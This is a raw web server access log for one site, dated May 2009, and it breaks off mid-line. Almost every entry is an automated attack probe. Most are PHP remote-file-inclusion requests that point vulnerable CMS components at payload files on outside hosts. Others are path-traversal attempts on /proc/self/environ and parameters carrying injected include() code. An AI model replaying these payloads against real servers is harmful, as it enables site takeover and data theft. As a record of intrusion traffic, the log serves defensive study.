218.249.36.194 - - [20/May/2009:11:13:31 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:13:31 -0700] "GET /logs/access_080702.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:13:31 -0700] "GET /logs/access_080530.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:11:13:32 -0700] "GET /logs//_head.php?_zb_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:11:13:32 -0700] "GET /_head.php?_zb_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:11:13:32 -0700] "GET /logs/access_071214.log//_head.php?_zb_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:11:13:34 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:13:34 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:11:13:39 -0700] "GET /logs/access_080411.log%20//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:11:13:39 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:11:13:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:11:13:41 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:11:13:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:11:13:41 -0700] "GET /logs/access_080411.log%20//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:11:13:47 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 200 42002 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:13:51 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:13:51 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:13:58 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:11:14:00 -0700] "GET /logs/access_081116.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:11:14:00 -0700] "GET /logs/access_080204.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:14:00 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:11:14:00 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 500 292 "-" "libwww-perl/5.76" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:14:04 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:14:04 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:14:04 -0700] "GET /logs/access_080530.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:14:04 -0700] "GET /logs/access_080702.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [20/May/2009:11:14:06 -0700] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.atu.bz/e_bbs///skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [20/May/2009:11:14:06 -0700] "GET /logs/access_071214.log///skin/zero_vote/ask_password.php?dir=http://www.atu.bz/e_bbs///skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [20/May/2009:11:14:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.atu.bz/e_bbs///skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:14:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:14:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:14:08 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:14:08 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [20/May/2009:11:14:10 -0700] "GET /logs/access_080331.log///skin/zero_vote/ask_password.php?dir=http://www.atu.bz/e_bbs///skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:11:14:13 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:22 -0700] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:22 -0700] "GET /logs/access_081118.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:11:14:24 -0700] "GET /logs/access_080615.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:24 -0700] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:24 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:25 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:26 -0700] "GET /logs/access_081118.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:27 -0700] "GET /logs/access_090215.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:14:29 -0700] "GET /logs/access_090215.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:11:14:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:11:14:44 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:11:14:44 -0700] "GET /logs/access_080615.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:14:50 -0700] "GET /logs/access_080211.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:14:50 -0700] "GET /logs/access_080812.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:11:14:52 -0700] "GET /logs/access_080729.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:53 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/access_080918.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:14:54 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:11:15:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:11:15:03 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:11:15:03 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:11:15:05 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:11:15:05 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:11:15:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:15:21 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:15:22 -0700] "GET /logs/access_080530.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:15:22 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:15:22 -0700] "GET /logs/access_080702.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [20/May/2009:11:15:32 -0700] "GET /logs/access_080204.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [20/May/2009:11:15:32 -0700] "GET /logs/access_081116.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.91.245 - - [20/May/2009:11:15:41 -0700] "GET /logs/access_080521.log/adxmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:43 -0700] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:43 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:43 -0700] "GET /logs/access_090215.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:44 -0700] "GET /search_wA.php?LIBPATH=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:44 -0700] "GET /logs/access_081023.log//search_wA.php?LIBPATH=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:45 -0700] "GET /logs/access_081231.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:11:15:45 -0700] "GET /logs//search_wA.php?LIBPATH=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:11:15:47 -0700] "GET /logs/access_080611.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [20/May/2009:11:15:52 -0700] "GET /logs/access_080611.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:53 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:53 -0700] "GET /logs/access_090205.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:54 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:15:56 -0700] "GET /logs/access_080303.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:15:56 -0700] "GET /logs/access_080303.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:15:56 -0700] "GET /logs/access_080303.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:15:56 -0700] "GET /logs/access_080303.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:57 -0700] "GET /logs/access_090205.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:57 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:57 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.85.142 - - [20/May/2009:11:15:58 -0700] "GET //skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:11:15:59 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.85.142 - - [20/May/2009:11:16:07 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.85.142 - - [20/May/200